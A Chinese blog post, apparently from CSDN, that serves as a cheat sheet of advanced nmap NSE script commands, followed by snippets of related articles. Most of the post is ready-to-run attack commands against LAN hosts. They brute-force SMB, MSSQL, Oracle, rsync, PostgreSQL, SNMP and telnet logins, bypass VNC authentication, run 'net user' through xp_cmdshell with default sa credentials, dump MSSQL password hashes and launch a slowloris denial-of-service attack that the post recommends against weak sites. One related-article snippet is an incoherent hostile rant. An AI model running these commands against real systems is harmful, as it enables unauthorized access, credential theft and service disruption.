nmap的高级扫描

最新推荐文章于 2024-07-25 14:38:11 发布
最新推荐文章于 2024-07-25 14:38:11 发布
阅读量1.6k 收藏 16
点赞数 1
  (1)  nmap --script=auth 192.168.137.*
  负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令
  (2)nmap --script=brute 192.168.137.*
  提供暴力破解的方式  可对 数据库,smb,snmp等进行简单密码的暴力猜解
  (3)nmap --script=default 192.168.137.* 或者 nmap -sC 192.168.137.*
  默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击
  (4)nmap --script=vuln 192.168.137.*
  检查是否存在常见漏洞
  (5)nmap -n -p445 --script=broadcast 192.168.137.4
  在局域网内探查更多服务开启状况
   检查vnc bypass
  nmap  --script=realvnc-auth-bypass 192.168.137.4
  (1)检查vnc认证方式
  nmap  --script=vnc-auth  192.168.137.4
  获取vnc信息
  nmap  --script=vnc-info  192.168.137.4
  (2)smb扫描:
  smb破解
  nmap  --script=smb-brute.nse 192.168.137.4
  smb字典破解
  nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
  smb已知几个严重漏
  nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4
  查看共享目录
  nmap -p 445  --script smb-ls --script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4
  查看会话
  nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4
  系统信息
  nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4
  (3)Mssql扫描:
  猜解mssql用户名和密码
  nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4
  xp_cmdshell 执行命令
  nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4
  (4)dumphash值
  nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4
  扫描root空口令
  nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4
  列出所有mysql用户
  nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4
  (5) Oracle扫描:
  oracle sid扫描
  nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5
  oracle弱口令破解
  nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5
  (6)其他一些比较好用的脚本
  nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关
  nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync
  nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解
  nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解
  nmap -sU --script snmp-brute 192.168.137.4            snmp破解
  nmap -sV --script=telnet-brute 192.168.137.4          telnet破解
  nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn
  nmap --script=http-methods.nse 192.168.137.4 检查http方法
  nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections
  nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4
  nmap --script=smb-brute --script-args=userdb=/tmp/帐号字典.txt,passdb=/tmp/密码字典.txt IP地址 -p 445
WTD654321
关注
Nmap脚本扫描。WordPress 4.9.18
weixin_58942038的博客
06-03 301
天灾水灾火灾人祸......频发。相对于某些除了我之外的愚人选择了以任何形式方式对抗神,独立思考和选择是一项远离愚人(除了我之外的人)的方式。 天灾水灾火灾人祸......频发。相对于某些除了我之外的愚人选择了以任何方式对抗神,独立思考和选择是一项远离愚人(除了我之外的人)的方式。除了我之外的全部以任何形式方式对抗我的人都是死路一条疯癫穷蠢丑废严重妄想症跳梁小丑死人。 (除了我之外的全部人都是蝼蚁死人。)
Nmap脚本扫描
YIGAOYU的博客
03-23 2436
Nmap脚本扫描 Nmap允许用户自己编写脚本进行自动化扫描操作,或者扩展Nmap现有的功能脚本文件的默认目录为: /usr/share/nmap/scripts,如图大概近600个不同分类不同功能的脚本 -sC参数等价于-sC=default使用默认类别的脚本进行扫描,可更换其他脚本类别。 这里简单介绍一下部分脚本参数: --script-args= <n1=v1,[n2=v2...]&...
2024最新【内网隐蔽扫描Nmap高级用法】(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-25 375
Nmap(Network Mapper)是一款开源免费的网络发现和安全审计工具,主要用于扫描目标主机的开放端口、操作系统类型、启用的服务等信息。以下是Nmap的一些常见使用介绍「主机发现」:Nmap可以通过发送不同类型的探测包(如ICMP echo请求、TCP SYN包等)来检测目标主机是否在线。常用命令如-sn(Ping扫描,只进行主机发现,不进行端口扫描)和-PE/PP/PM(使用ICMP echo、timestamp、netmask请求包发现主机)。「端口扫描
Nmap中一些常用的NSE脚本
TENCENTSYS的博客
08-24 1006
Nmap 一款标志性的跨平台扫描器。它的原意为Network Mapper(网络映射器),具有相当强大的扫描功能,几乎适用于任何渗透场景。不少人甚至认为它就是全球最好的扫描软件。除了常规的网络扫描Nmap还可根据NSE (Nmap scripting Engine)的脚本进行大量渗透工作,这种脚本是基于Lua编程语言,有点像javascript。正是NSE,使得Nmap不再普通。 首先,我们扫描...
nmap扫描工控设备的脚本支持
小人物的编程
04-29 1139
介绍了nmap脚本使用
漏洞扫描-Nmap脚本
小水池
05-13 3435
以smb-vuln-ms10-061.nse为例 smb-vuln-ms10-061.nse(Stuxnet蠕虫利用的4个漏洞之一) -Print Spooler权限不当,打印请求可在系统目录创建文件,执行任意代码 利用方法: nmap -p445 –script=smb-vuln-ms10-061.nse+ip Nmap脚本存放路径: cd /usr/sha...
网络安全防御技术:NMAP高级扫描策略与应用
NMAP支持灵活多样的扫描技术,包括TCP全连接扫描、UDP扫描、SYN半开放扫描等,使其成为网络安全领域中不可或缺的利器。 ## 1.2 NMAP扫描原理解析 NMAP扫描原理主要基于操作系统对网络协议的实现和相应端口对...
Nmap高级用法与典型场景
03-03
Nmap既能应用于简单的网络信息扫描,也能用在高级、复杂、特定的环境中:例如扫描互联网上大量的主机;绕开防火墙/IDS/IPS;扫描Web站点;扫描路由器等等。全面扫描nmap-T4-Atargetip主机发现:nmap-T4-sntargetip...
nmap全开扫描,半开扫描_nmap扫描的阶段
weixin_26636643的博客
08-25 5122
nmap全开扫描,半开扫描Hello readers, hope you all doing well. 各位读者好,希望大家一切都好。 For security researchers and hackers nmap must be their breakfast to start their day with. Well, given the diverse functionality a...
nmap扫描.docx
11-08
Nmap通过一系列高级扫描技术,如TCP同步扫描、半开放式扫描、UDP扫描等,来确定主机的在线状态、运行的服务以及操作系统指纹。 **扫描类型与技术** 1. **sS/TCP 同步扫描**:发送SYN包,但不完成三次握手,以减少...
nmap工控扫描脚本(s7-info.nsa)
12-24
针对S7工控协议的nmap扫描脚本,使用该脚本可以获得基于S7协议的组件的详细信息
自动执行Nmap扫描的工具LazyMap.zip
07-19
LazyMap可以自动进行nmap扫描,并且能自动生成定制的Nessus策略。特点扫描存活的设备对发现的设备自动进行端口扫描可以同时在多个网卡上运行多个实例为每次扫描生成一个参考目录以Nessus格式输出开放的端口,实现在Nessus中快速扫描默认以T4速度扫描。如果你认为这太慢了,在扫描窗口中输入CTRL C,它就会清空并重新以T5速度扫描。日志记录开始和结束时间、存活主机、开放端口针对扫描出的端口,自动创建一个定制的Nessus策略,加快扫描速度请仔细阅读脚本的开头部分,你需要在脚本所在的目录下保存一个默认的模板,才能自动创建Nessus策略。脚本会检测这个默认的模板,并在每次扫描完成之后创建一个Nessus策略。将策略导入到Nessus中,就可以扫描脚本发现的存活设备了。这可以节约大量的扫描时间,并且能提供精确的扫描结果。默认会执行full TCP、Quick UDP、Common ports和Safe Script扫描。你可以修改脚本的开头部分,开启或关闭这些选项。安装git clone https://github.com/commonexploits/port-scan-automation.git运行./lazymap.sh要求NMAP http://www.nmap.or
Nmap脚本总结(看这一篇就够了)
Shinyhuang_的博客
12-06 5034
原文地址:http://drops.wooyun.org/tips/2188 0x01 nmap按脚本分类扫描 nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式进行比较笼统的扫描: auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 brute: 提供暴力破解方式,针对常见的应用如http/snmp等 default: 使用-sC或-A选项扫描时候默认的脚本,
Linux中使用nmap基本使用以及扫描一组计算机的脚本
没刮胡子的程序员专栏
07-13 1204
Nmap(Network Mapper)是一个开源的网络探测和安全评估工具。它用于扫描和发现网络上的主机、端口和服务,以及评估网络的安全性
nmap脚本
hackerie的博客
09-20 718
nmap脚本使用总结0x00 前言:nmap的基本介绍和基本使用方法,在乌云知识库中已经有人提交过,讲的比较详细,在此文中就不再讲述。 具体链接:http://drops.wooyun.org/tips/2002本文主要讲解nmap的众多脚本的使用,在内网渗透的时候尤其好用。Nmapnmap -T4 -A -v 192.168.10.100nmap -A -v www.baidu.com/24nma
第八章(二)—漏洞扫描nmap脚本使用)
weixin_43876557的博客
06-05 9104
nmap脚本 nmap扫描脚本,默认集成500多个脚本,这些脚本是有分类的,每个脚本所做的工作是不同方面的。 /usr/share/nmap/scripts/ #nmap的脚本都在该目录下存放 cat script.db less script.db | grep vuln | wc -l #查看nmap中有多少个关于弱点vuln的脚本 每个脚本后面都有一个分类categories,后面的参数内容描述了该脚本属于哪些分类 smb-vuln-ms10-061.nse 这个脚本是stuxnet蠕虫利
常用的Nmap脚本及使用实例
jklbnm12的博客
11-04 1842
Nmap的脚本主要分为以下几类。 ●Auth:负责处理鉴权证书(绕过鉴权)的脚本。 ●Broadcast:在局域网内探查更多服务的开启情况,如DHCP/DNS/ SQLServer等。 ●Brute:针对常见的应用提供暴力破解方式,如HTTP/SMTP等。 ●Default:使用-sC或A选项扫描时默认的脚本,提供基本的脚本扫描能 力。 ●Discovery:对网络进行更多信息的搜集,如SMB枚举、SNM P查询等。 ●Dos:用于进行拒绝服务攻击。 ●Exploit:利用已知的漏洞入侵系统。 ●Exte
Nmap脚本的相关使用指南
qq_42801460的博客
03-22 510
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一,以及用以评估网络系统安全。—— 来自百度百科那么今天带大家来揭露Nmap的另一个面纱 ,那就是脚本。在某些时候,我们大部分都使用Nmap进行扫描,然后再通过Metasploit进行漏洞利用,但是这个过程比较繁琐,一个个漏洞去验证的话还需要打开MSF去设置参数,最后run/exploit(不包括自动化,所以不要喷了)。
2021-09-10 网安实验-漏洞扫描与利用之Nmap网络扫描脚本使用
热门推荐
时光隧道
09-10 4万+
一:nmap脚本介绍 1.基本使用 在使用nmap时,通过在命令中加–scritp就可以调用nmap的脚本来配合扫描Nmap自带后已经安装了很多脚本,kali中的路径如下所示 auth 处理身份验证 broadcast 网络广播 brute 暴力猜解 default 默认 discovery 服务发现 dos 拒绝服务 exploit 漏洞利用 external 外部扩展 fuzzer 模糊测试 intrusive 扫描可能造成不良后果 malware 检测后门 safe 扫描危害
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值